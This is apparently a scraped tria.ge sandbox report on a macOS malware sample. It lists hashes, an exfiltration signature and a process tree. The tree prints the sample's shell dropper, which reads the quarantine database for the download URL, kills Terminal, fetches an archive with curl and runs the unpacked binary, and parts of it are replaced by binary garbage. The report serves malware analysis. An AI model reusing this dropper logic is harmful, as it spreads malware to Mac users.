Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

Macos-Malw...0d9d0b

macos-10.15-amd64

7

Macos-Malw...e6cad8

macos-10.15-amd64

7

Macos-Malw...858d9a

macos-10.15-amd64

1

Macos-Malw...8a248d

macos-10.15-amd64

7

Macos-Malw...a2394d

macos-10.15-amd64

1

Macos-Malw...db8b08

macos-10.15-amd64

7

Macos-Malw...1dd006

macos-10.15-amd64

7

Macos-Malw...4b1694

macos-10.15-amd64

1

Macos-Malw...cba061

macos-10.15-amd64

7

Macos-Malw...0ac417

macos-10.15-amd64

1

Macos-Malw...623edb

macos-10.15-amd64

1

Macos-Malw...715108

macos-10.15-amd64

1

Macos-Malw...0f989b

macos-10.15-amd64

1

Macos-Malw...5953fb

macos-10.15-amd64

7

Macos-Malw...997f4e

macos-10.15-amd64

1

Macos-Malw...c42693

macos-10.15-amd64

1

Macos-Malw...178f1a

macos-10.15-amd64

7

Macos-Malw...bb3f2a

macos-10.15-amd64

7

Macos-Malw...cfc69b

macos-10.15-amd64

7

Macos-Malw...53d096

macos-10.15-amd64

7

Macos-Malw...c2eb29

macos-10.15-amd64

7

Macos-Malw...684200

macos-10.15-amd64

1

Macos-Malw...e2020a

macos-10.15-amd64

7

Macos-Malw...e86dc4

macos-10.15-amd64

1

Macos-Malw...884d52

macos-10.15-amd64

7

Macos-Malw...32440c

macos-10.15-amd64

7

Macos-Malw...11b661

macos-10.15-amd64

7

Macos-Malw...40d4f3

macos-10.15-amd64

1

Macos-Malw...c98e38

macos-10.15-amd64

1

Macos-Malw...bf2f25

macos-10.15-amd64

1

Macos-Malw...7ca34f

macos-10.15-amd64

1

Macos-Malw...f5704d

macos-10.15-amd64

1

Analysis

  • max time kernel
    44s
  • max time network
    153s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    17/02/2025, 18:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52

  • Size

    34KB

  • MD5

    e1f0b7c30cd044ca98c6f24caeff869f

  • SHA1

    1a1a35824946497e09b04e0ef4ab146e7ce3daea

  • SHA256

    1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52

  • SHA512

    3c4a31060f556f57e14e3f6108eaa1fd7167e33e214f52ece38cc72affa262be2f99986c0b95a70c4034d319c30a15a112db1cea92366649a45a22a1fd0de276

  • SSDEEP

    384:CMCyAH1ICtuL//Hk/eUlpEf0cotU2HguYZ5xVAvr+Q8qr3vFrh6rHskrNab8eri:DObtm3k/HipotXAuYZ3mp8uv75mab8z

Score
7/10
exfiltration

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

    exfiltration

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52\""
    1⤵
      PID:490
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52\""
      1⤵
        PID:490
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52
        1⤵
          PID:490
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52
            2⤵
              PID:491
            • /Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52
              /Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52
              2⤵
                PID:491
            • /bin/sh
              sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]���#������>�i�PȆ�����'�: Mb��Y�]��Hy����%�� `:{�����I������j�|���������V�R������2�G�M�og�y�˞Cr|���㜇��%j�}�D>��yp�A˚�j@���3+�h-�?���9|SGIV�/Od�k�Zp �����埈�����u3-�Wc=��o݄in�\\��*\$I��:�^FOh1�r+����}�jy}�%{4:_}� ���&:C�� �gF`�ݗ�~Br[�(�d��l5��g�S]�-�^���dq� �IQr@����>�*�.�E0�^�Sy��g;�\\����>��a�#R����hz? ;>��ոS�󘞽���C�Ǖ�\\}\":S��dq�C �n���/�%k<� XĹ(�����o��A�;�n!�&���H5KMr�'�#�s<a�(E�/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";loca��R�?i��߭k\$q����Ǔ�_j6�e�%yn�G~�!�P�b���JF�l8‰�P2y�WZ��{���q���c��`<�n ٨Ы�F�:�(̣������}���:��Cb�!��!�k���n�DM�&Pn��홖��ݰ��� V�"
              1⤵
                PID:492
              • /bin/bash
                sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]���#������>�i�PȆ�����'�: Mb��Y�]��Hy����%�� `:{�����I������j�|���������V�R������2�G�M�og�y�˞Cr|���㜇��%j�}�D>��yp�A˚�j@���3+�h-�?���9|SGIV�/Od�k�Zp �����埈�����u3-�Wc=��o݄in�\\��*\$I��:�^FOh1�r+����}�jy}�%{4:_}� ���&:C�� �gF`�ݗ�~Br[�(�d��l5��g�S]�-�^���dq� �IQr@����>�*�.�E0�^�Sy��g;�\\����>��a�#R����hz? ;>��ոS�󘞽���C�Ǖ�\\}\":S��dq�C �n���/�%k<� XĹ(�����o��A�;�n!�&���H5KMr�'�#�s<a�(E�/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";loca��R�?i��߭k\$q����Ǔ�_j6�e�%yn�G~�!�P�b���JF�l8‰�P2y�WZ��{���q���c��`<�n ٨Ы�F�:�(̣������}���:��Cb�!��!�k���n�DM�&Pn��홖��ݰ��� V�"
                1⤵
                  PID:492

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads